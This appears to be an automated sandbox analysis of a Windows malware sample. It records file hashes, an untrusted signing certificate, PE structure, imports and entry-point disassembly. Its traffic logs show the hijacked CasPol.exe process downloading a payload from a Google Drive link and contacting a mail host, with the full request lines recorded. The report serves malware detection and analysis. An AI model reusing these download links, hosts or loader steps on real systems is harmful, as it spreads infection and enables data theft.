                                                                              SHA256:7500744cb96ef00da3854791e50622a7c5c0e1cdcf0708c7a7755070509d90b5
                                                                              SHA512:23d65fe1097ac9fbba1e6035c40a2b5c45bcb83108086378fdfc1a6026aaff9d1952f2f90bf9df60fe0d98e770902b156a84df49d23183faacf34fa9fdfdb987
                                                                              SSDEEP:6144:71ssjoruNxdoWcofJfBxzKQPdJIwAIk8+44GI8uQd5xEOKz:qsMQEAf3xvIYk8U9xz
                                                                              TLSH:0AE4F8655532B807C1C789B0F53082F69F606D9458F3885F26E1F74AEDBFBA10A27887
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@
                                                                              Icon Hash:0066f6ecb4b23004
                                                                              Entrypoint:0x4033b3
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x614F9B3C [Sat Sep 25 21:57:16 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:5f0c714c36e6cc016b3a1f4bc86559e4
                                                                              Signature Valid:false
                                                                              Signature Issuer:CN="Forstaaende Vrker ", O=Counterrate, L=Stoke Ferry, S=England, C=GB
                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                              Error Number:-2146762487
                                                                              Not Before, Not After
                                                                              • 08/08/2021 22:32:34 07/08/2024 22:32:34
                                                                              Subject Chain
                                                                              • CN="Forstaaende Vrker ", O=Counterrate, L=Stoke Ferry, S=England, C=GB
                                                                              Version:3
                                                                              Thumbprint MD5:EC7E17E8F70907663DB9D68C45C91F76
                                                                              Thumbprint SHA-1:FD333282443B5807CBAA3E9BEFECD08111040340
                                                                              Thumbprint SHA-256:0E97CEEB963A2334D796BAAEB285E404B11C4C6AAC763D2728785689D7480719
                                                                              Serial:5AF69D321272C297
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              sub esp, 00000220h
                                                                              push esi
                                                                              push edi
                                                                              xor edi, edi
                                                                              push 00008001h
                                                                              mov dword ptr [ebp-10h], edi
                                                                              mov dword ptr [ebp-04h], 0040A198h
                                                                              mov dword ptr [ebp-08h], edi
                                                                              mov byte ptr [ebp-0Ch], 00000020h
                                                                              call dword ptr [004080B8h]
                                                                              mov esi, dword ptr [004080BCh]
                                                                              lea eax, dword ptr [ebp-000000C0h]
                                                                              push eax
                                                                              mov dword ptr [ebp-000000ACh], edi
                                                                              mov dword ptr [ebp-2Ch], edi
                                                                              mov dword ptr [ebp-28h], edi
                                                                              mov dword ptr [ebp-000000C0h], 0000009Ch
                                                                              call esi
                                                                              test eax, eax
                                                                              jne 00007F85C8F734E1h
                                                                              lea eax, dword ptr [ebp-000000C0h]
                                                                              mov dword ptr [ebp-000000C0h], 00000094h
                                                                              push eax
                                                                              call esi
                                                                              cmp dword ptr [ebp-000000B0h], 02h
                                                                              jne 00007F85C8F734CCh
                                                                              movsx cx, byte ptr [ebp-0000009Fh]
                                                                              mov al, byte ptr [ebp-000000ACh]
                                                                              sub ecx, 30h
                                                                              sub al, 53h
                                                                              mov byte ptr [ebp-26h], 00000004h
                                                                              neg al
                                                                              sbb eax, eax
                                                                              not eax
                                                                              and eax, ecx
                                                                              mov word ptr [ebp-2Ch], ax
                                                                              cmp dword ptr [ebp-000000B0h], 02h
                                                                              jnc 00007F85C8F734C4h
                                                                              and byte ptr [ebp-26h], 00000000h
                                                                              cmp byte ptr [ebp-000000ABh], 00000041h
                                                                              jl 00007F85C8F734B3h
                                                                              movsx ax, byte ptr [ebp-000000ABh]
                                                                              sub eax, 40h
                                                                              mov word ptr [ebp-2Ch], ax
                                                                              jmp 00007F85C8F734A6h
                                                                              mov word ptr [ebp-2Ch], di
                                                                              cmp dword ptr [ebp-000000BCh], 0Ah
                                                                              jnc 00007F85C8F734AAh
                                                                              and word ptr [ebp+00000000h], 0000h
                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x6faa0.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xa0ae80x1e70.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x65ba0x6600False0.677734375data6.4837786344312045IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x80000x13820x1400False0.4626953125data5.262676635269928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xa0000x255380x600False0.462890625data4.130139712023956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x300000x1b0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x4b0000x6faa00x6fc00False0.275484567253915data4.047399580533331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0x4b3700x42028dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                              RT_ICON0x8d3980x12428dataEnglishUnited States
                                                                              RT_ICON0x9f7c00x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                              RT_ICON0xaffe80x4c28dataEnglishUnited States
                                                                              RT_ICON0xb4c100x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                              RT_ICON0xb71b80x10a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                              RT_ICON0xb82600xea8dataEnglishUnited States
                                                                              RT_ICON0xb91080x8a8dataEnglishUnited States
                                                                              RT_ICON0xb99b00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                              RT_ICON0xb9f180x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                              RT_DIALOG0xba3800x100dataEnglishUnited States
                                                                              RT_DIALOG0xba4800x11cdataEnglishUnited States
                                                                              RT_DIALOG0xba5a00xc4dataEnglishUnited States
                                                                              RT_DIALOG0xba6680x60dataEnglishUnited States
                                                                              RT_GROUP_ICON0xba6c80x92dataEnglishUnited States
                                                                              RT_MANIFEST0xba7600x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                              DLLImport
                                                                              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, SetWindowPos, SetCursor, GetSysColor, SetClassLongA, GetWindowLongA, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersionExA, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 21, 2022 15:29:05.524230003 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.524315119 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.524461031 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.542284966 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.542344093 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.592283010 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.592436075 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.592458963 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.594224930 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.594419003 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.726926088 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.726986885 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.727721930 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:05.727987051 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.731340885 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:05.774509907 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:06.313523054 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:06.313745022 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:06.313822985 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:06.313934088 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:06.314002037 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:06.314028978 CEST44349769142.250.181.238192.168.11.20
                                                                              Jul 21, 2022 15:29:06.314184904 CEST49769443192.168.11.20142.250.181.238
                                                                              Jul 21, 2022 15:29:06.479895115 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.479974031 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.480178118 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.480820894 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.480885983 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.534291029 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.534487963 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.536983013 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.537230968 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.541502953 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.541527033 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.541963100 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.542098045 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.542386055 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.582501888 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.801898956 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.802144051 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.802208900 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.802449942 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.802736998 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.802943945 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.802975893 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.802987099 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.804426908 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.804683924 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.804716110 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.805180073 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.805367947 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.805408955 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.805660963 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.805893898 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.806076050 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.806113005 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.806355953 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.810561895 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.810770035 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.810806036 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.810981035 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.811002970 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.811024904 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.811336040 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.811579943 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.811886072 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.811925888 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.812128067 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.812450886 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.812630892 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.812666893 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.813002110 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.813199043 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.813456059 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.813514948 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.813776016 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.813925982 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.814135075 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.814183950 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.814435959 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.814713001 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.814975977 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.815035105 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.815243006 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.815542936 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.815793037 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.815838099 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.816042900 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.816224098 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.816390991 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.816436052 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.816744089 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.816793919 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.816998959 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.817047119 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.817298889 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.817462921 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.817679882 CEST49770443192.168.11.20216.58.212.161
                                                                              Jul 21, 2022 15:29:06.817724943 CEST44349770216.58.212.161192.168.11.20
                                                                              Jul 21, 2022 15:29:06.817912102 CEST44349770216.58.212.161192.168.11.20
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 21, 2022 15:29:05.503237963 CEST5127753192.168.11.201.1.1.1
                                                                              Jul 21, 2022 15:29:05.512196064 CEST53512771.1.1.1192.168.11.20
                                                                              Jul 21, 2022 15:29:06.437171936 CEST4944953192.168.11.201.1.1.1
                                                                              Jul 21, 2022 15:29:06.474968910 CEST53494491.1.1.1192.168.11.20
                                                                              Jul 21, 2022 15:29:18.346283913 CEST6077153192.168.11.201.1.1.1
                                                                              Jul 21, 2022 15:29:18.926516056 CEST53607711.1.1.1192.168.11.20
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Jul 21, 2022 15:29:05.503237963 CEST192.168.11.201.1.1.10x3326Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:29:06.437171936 CEST192.168.11.201.1.1.10x732eStandard query (0)doc-00-as-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:29:18.346283913 CEST192.168.11.201.1.1.10xa24fStandard query (0)mail.hemegas.esA (IP address)IN (0x0001)
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Jul 21, 2022 15:29:05.512196064 CEST1.1.1.1192.168.11.200x3326No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:29:06.474968910 CEST1.1.1.1192.168.11.200x732eNo error (0)doc-00-as-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                              Jul 21, 2022 15:29:06.474968910 CEST1.1.1.1192.168.11.200x732eNo error (0)googlehosted.l.googleusercontent.com216.58.212.161A (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:29:18.926516056 CEST1.1.1.1192.168.11.200xa24fNo error (0)mail.hemegas.eshemegas.esCNAME (Canonical name)IN (0x0001)
                                                                              Jul 21, 2022 15:29:18.926516056 CEST1.1.1.1192.168.11.200xa24fNo error (0)hemegas.es37.59.226.102A (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:35:15.077992916 CEST1.1.1.1192.168.11.200x355eNo error (0)windowsupdatebg.s.llnwi.net95.140.236.0A (IP address)IN (0x0001)
                                                                              Jul 21, 2022 15:35:15.077992916 CEST1.1.1.1192.168.11.200x355eNo error (0)windowsupdatebg.s.llnwi.net178.79.242.128A (IP address)IN (0x0001)
                                                                              • drive.google.com
                                                                              • doc-00-as-docs.googleusercontent.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.11.2049769142.250.181.238443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-07-21 13:29:05 UTC0OUTGET /uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2022-07-21 13:29:06 UTC0INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Thu, 21 Jul 2022 13:29:06 GMT
                                                                              Location: https://doc-00-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqatmvl66vlquhfk3geif26gbr2f/1658410125000/11160273513571171813/*/1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N?e=download&uuid=bec227ee-0406-4da7-b66d-39be02ab3f2d
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: script-src 'nonce-bYa9ipFzzUlZehWJWAoMXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.11.2049770216.58.212.161443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-07-21 13:29:06 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqatmvl66vlquhfk3geif26gbr2f/1658410125000/11160273513571171813/*/1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N?e=download&uuid=bec227ee-0406-4da7-b66d-39be02ab3f2d HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                              Cache-Control: no-cache
                                                                              Host: doc-00-as-docs.googleusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2022-07-21 13:29:06 UTC2INHTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: ADPycdvvt7mhwMaRrESUUIuKUdOaT9cgRYaLqQdky-8phE2e8pZYdZQIaOVFYL7-utmhU94zJ7QH3JRhqwmarzDlgC3BFA
                                                                              Content-Type: application/octet-stream
                                                                              Content-Disposition: attachment; filename="anyaegbu_MKVyTuSRE10.bin"; filename*=UTF-8''anyaegbu_MKVyTuSRE10.bin
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, 